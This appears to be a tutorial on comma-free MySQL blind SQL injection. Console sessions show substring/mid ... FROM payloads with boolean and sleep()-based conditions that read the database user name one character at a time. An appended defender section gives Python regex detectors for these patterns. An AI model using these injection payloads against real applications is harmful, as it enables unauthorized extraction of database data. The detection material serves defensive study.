0x00 Overview
Injection methods for when the comma (,) is not allowed to appear
- substring(str FROM pos)
- substr(str FROM pos)
- mid(str FROM pos)
- Returns the substring of str that starts at position pos (Solution 2 below adds FOR len to limit its length)
0x01 Solutions
0x01.1 Solution 1
mysql> select ascii(substring((select user()) from 1));
+------------------------------------------+
| ascii(substring((select user()) from 1)) |
+------------------------------------------+
|                                      114 |
+------------------------------------------+
1 row in set (0.00 sec)

mysql> select ascii(substring((select user()) from 2));
+------------------------------------------+
| ascii(substring((select user()) from 2)) |
+------------------------------------------+
|                                      111 |
+------------------------------------------+
1 row in set (0.00 sec)
0x01.2 Solution 2
mysql> select substring((select user()) from 1 for 1);
+-----------------------------------------+
| substring((select user()) from 1 for 1) |
+-----------------------------------------+
| r                                       |
+-----------------------------------------+
1 row in set (0.00 sec)

mysql> select substring((select user()) from 2 for 1);
+-----------------------------------------+
| substring((select user()) from 2 for 1) |
+-----------------------------------------+
| o                                       |
+-----------------------------------------+
1 row in set (0.00 sec)
0x02 Blind injection experiment
0x02.1 Base data
// Current user
mysql> select user();
+----------------+
| user()         |
+----------------+
| root@localhost |
+----------------+
1 row in set (0.00 sec)

// Test data
mysql> select * from test where id = 1;
+----+------+------+---------+
| id | test | map  | content |
+----+------+------+---------+
|  1 |    1 | NULL | NULL    |
+----+------+------+---------+
1 row in set (0.00 sec)
0x02.2 Encoding conversion
// ASCII code of the first character
mysql> select ascii(mid(user() from 1));
+---------------------------+
| ascii(mid(user() from 1)) |
+---------------------------+
|                       114 |
+---------------------------+
1 row in set (0.00 sec)

// ASCII code of the second character
mysql> select ascii(mid(user() from 2));
+---------------------------+
| ascii(mid(user() from 2)) |
+---------------------------+
|                       111 |
+---------------------------+
1 row in set (0.00 sec)

// Decimal code back to a character
mysql> select char(114);
+-----------+
| char(114) |
+-----------+
| r         |
+-----------+
1 row in set (0.00 sec)

// Decimal code back to a character
mysql> select char(111);
+-----------+
| char(111) |
+-----------+
| o         |
+-----------+
1 row in set (0.00 sec)
0x02.3 Solution 1: boolean-based blind injection to read the database user name
The three functions substring, substr and mid are used in exactly the same way, so only one of them is shown as an example.
// Correct case
mysql> SELECT * from test where id = 1 and (select ascii(mid(user() from 1))=114);
+----+------+------+---------+
| id | test | map  | content |
+----+------+------+---------+
|  1 |    1 | NULL | NULL    |
+----+------+------+---------+
1 row in set (0.00 sec)

// Incorrect case
mysql> SELECT * from test where id = 1 and (select ascii(mid(user() from 1))=119);
Empty set (0.00 sec)
0x02.4 Solution 1: time-based blind injection to read the database user name
The three functions substring, substr and mid are used in exactly the same way, so only one of them is shown as an example.
// Correct case
mysql> SELECT * from test where id = 1 and case when(ascii(substring(user() from 1))=114) then sleep(5) else 0 end;
Empty set (5.00 sec)

// Incorrect case
mysql> SELECT * from test where id = 1 and case when(ascii(substring(user() from 1))=119) then sleep(5) else 0 end;
Empty set (0.00 sec)
0x02.5 Solution 2: time-based blind injection to read the database user name
The three functions substring, substr and mid are used in exactly the same way, so only one of them is shown as an example.
// Correct case
mysql> SELECT * from tdb_goods where goods_id = 1 and case when(substring(user() from 1 for 1)='r') then sleep(5) else 0 end;
Empty set (5.00 sec)

// Incorrect case
mysql> SELECT * from tdb_goods where goods_id = 1 and case when(substring(user() from 1 for 1)='x') then sleep(5) else 0 end;
Empty set (0.00 sec)
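Added defender-side example (not part of the original post): a Python check showing why a filter that only rejects commas misses the FROM-form shown above, next to regex indicators for the substring FROM, ascii() comparison and CASE WHEN ... sleep() patterns that can be applied to parameter values or query logs instead. The sample values are constructed from the post's own injected conditions; the durable fix remains parameterized queries rather than keyword blocklists.

```python
import re

# Heuristic indicators for the comma-free blind-injection primitives shown above.
# 1. substring/substr/mid(expr FROM pos [FOR len]) - the comma-free substring form.
SUBSTR_FROM = re.compile(
    r"\b(?:substring|substr|mid)\s*\(.*?\bfrom\s+\d+(?:\s+for\s+\d+)?\s*\)", re.I)
# 2. ascii(...) compared with a number - one character of a boolean-blind guess.
ASCII_CMP = re.compile(r"\bascii\s*\(.*?\)\s*=\s*\d+", re.I)
# 3. CASE WHEN ... sleep(n) - the time-based variant.
TIME_DELAY = re.compile(r"\bcase\s+when\b.*?\bsleep\s*\(\s*\d+\s*\)", re.I)


def comma_filter_blocks(value: str) -> bool:
    """The weak rule the post bypasses: reject a value only if it contains a comma."""
    return "," in value


def indicators(value: str) -> list:
    """Names of the blind-injection indicators found in one user-supplied value."""
    hits = []
    if SUBSTR_FROM.search(value):
        hits.append("substring-from")
    if ASCII_CMP.search(value):
        hits.append("ascii-compare")
    if TIME_DELAY.search(value):
        hits.append("time-delay")
    return hits


def scan(values: list) -> list:
    """Compare the comma-only filter with the indicator rules on each value."""
    return [{"value": v, "comma_filter_blocks": comma_filter_blocks(v),
             "indicators": indicators(v)} for v in values]


# Constructed sample values for the `id` parameter (not captured traffic): a benign
# value, the three injected tails from the post's queries, and a comma-using form.
SAMPLE_VALUES = [
    "1",
    "1 and (select ascii(mid(user() from 1))=114)",
    "1 and case when(ascii(substring(user() from 1))=114) then sleep(5) else 0 end",
    "1 and case when(substring(user() from 1 for 1)='r') then sleep(5) else 0 end",
    "1 and ascii(substring(user(),1,1))=114",
]

if __name__ == "__main__":
    for row in scan(SAMPLE_VALUES):
        print(row["comma_filter_blocks"], row["indicators"], row["value"])
```

Only the last, comma-using value is caught by the comma filter; the three FROM-form values pass it untouched while the indicator rules flag every one of them.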
